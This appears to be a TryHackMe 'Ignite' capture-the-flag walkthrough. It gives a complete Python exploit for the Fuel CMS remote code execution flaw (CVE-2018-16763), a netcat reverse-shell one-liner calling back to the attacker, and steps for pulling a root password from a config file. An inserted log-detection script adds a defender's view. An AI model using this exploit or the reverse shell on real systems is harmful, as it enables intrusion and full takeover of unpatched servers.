TryHackMe ‘Ignite’ Room Walkthrough
“Root the box! Designed and created by DarkStar7471, built by Paradox.”
Enumeration
Use a simple NMAP scan to enumerate the machine.
-oN is optional; it saves the normal-format output to a file named nmapInitial.
nmap -sC -sV -oN nmapInitial [Target ip]
The nmap scan reveals port 80 open, and the http-robots.txt script lists /fuel as a disallowed entry. The same output also shows that the site runs Fuel CMS.
Before checking out the webpage itself, check the CVE entries for Fuel. CVE-2018-16763 for Fuel CMS shows the service is vulnerable to remote code execution (RCE). A Python exploit is also provided for it.
The webpage itself seems to be no help, so the RCE exploit will probably be the best route. After downloading the exploit, change [Target Address] to the victim IP address (be sure to drop the square brackets around the target address). The code should look as follows:
import requests
import urllib

# Python 2 script (raw_input and the print statement); run it with python2.
# Replace the placeholder with the victim address, without the brackets.
url = "http://[Target Address]"

def find_nth_overlapping(haystack, needle, n):
    # Return the index of the n-th occurrence of needle in haystack (-1 if absent)
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
    xxxx = raw_input('cmd:')
    # The command is injected into the PHP filter parameter of /fuel/pages/select/
    burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
    # Requests go through a local Burp proxy; drop proxies=proxy if Burp is not running
    proxy = {"http":"http://127.0.0.1:8080"}
    r = requests.get(burp0_url, proxies=proxy)
    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)
    # The command output comes back before a page body that is rendered twice,
    # so print only up to the second copy of the first 20 characters
    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)
    print r.text[0:dup]
Initial Attack and Exploit
Run the exploit and we will be able to run commands on the victim machine:
Commands must be included inside quotes, otherwise the script will fail. For example, “whoami” is acceptable but whoami is not.
With this RCE exploit we have gained command execution on the machine. We can get the user flag here, or upgrade to a shell first.
To get a shell, let's start a netcat listener on our machine:
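From the defender's side, as an added example that is not part of the original walkthrough: the exploit above carries its PHP payload in the filter parameter of /fuel/pages/select/, so a web server access log can be checked by decoding that parameter and flagging PHP calls inside it. The log lines below are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format access log lines (not from a real host).
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27whoami%27%29%2b%27 HTTP/1.1" 200 5123 "-" "python-requests/2.25.1"
10.10.14.5 - - [01/Jan/2024:10:00:02 +0000] "GET /fuel/pages/select/?filter=home HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
10.10.14.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# PHP constructs that have no business inside a CMS page filter value.
SUSPICIOUS = re.compile(r"pi\s*\(|print\s*\(|\$\w+\s*=|system|exec|passthru|shell_exec", re.IGNORECASE)


def decode_filter(target):
    """Return the fully URL-decoded filter parameter of /fuel/pages/select/, or None."""
    parts = urlsplit(target)
    if not parts.path.startswith("/fuel/pages/select"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("filter")
    if not values:
        return None
    # parse_qs already decoded once; decode again in case the value was double-encoded.
    return unquote(values[0])


def find_fuel_rce_attempts(log_text):
    """Return one dict per request whose decoded filter value contains PHP code."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_filter(m.group("target"))
        if decoded is not None and SUSPICIOUS.search(decoded):
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "filter": decoded})
    return hits


if __name__ == "__main__":
    for hit in find_fuel_rce_attempts(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], repr(hit["filter"]))
```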
nc -lnvp 4444
To get a shell run the following command:
cmd:"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Tun interface ip] 4444 >/tmp/f"
Update the IP address in the command to the IP address of your machine that is reachable from the victim. If connecting to THM through the OpenVPN connection on a Kali Linux machine, use the tun0 interface, whose IP starts with 10.10.X.X. Double check that the port netcat listens on matches the port in the command; in this example we are using port 4444.
After running these commands, we should get an interactive shell, still with the access level of www-data. You can get the user flag from /home/www-data.
Privilege Escalation
To escalate privileges on this machine, we will make use of improperly stored credentials that the web user can read. They sit in the web files at:
/var/www/html/fuel/application/config/database.php
Here we find the root password as: mememe
To exploit this we simply use su as follows:
su root
With this you can access /root and cat out the root flag.
su may give the output “su: must be run from a terminal”. In this case, use the following command to upgrade the shell to a proper terminal, after which su will work:
/usr/bin/script -qc /bin/bash /dev/null
You should then get a new prompt, www-data@ubuntu:, and can continue with su root.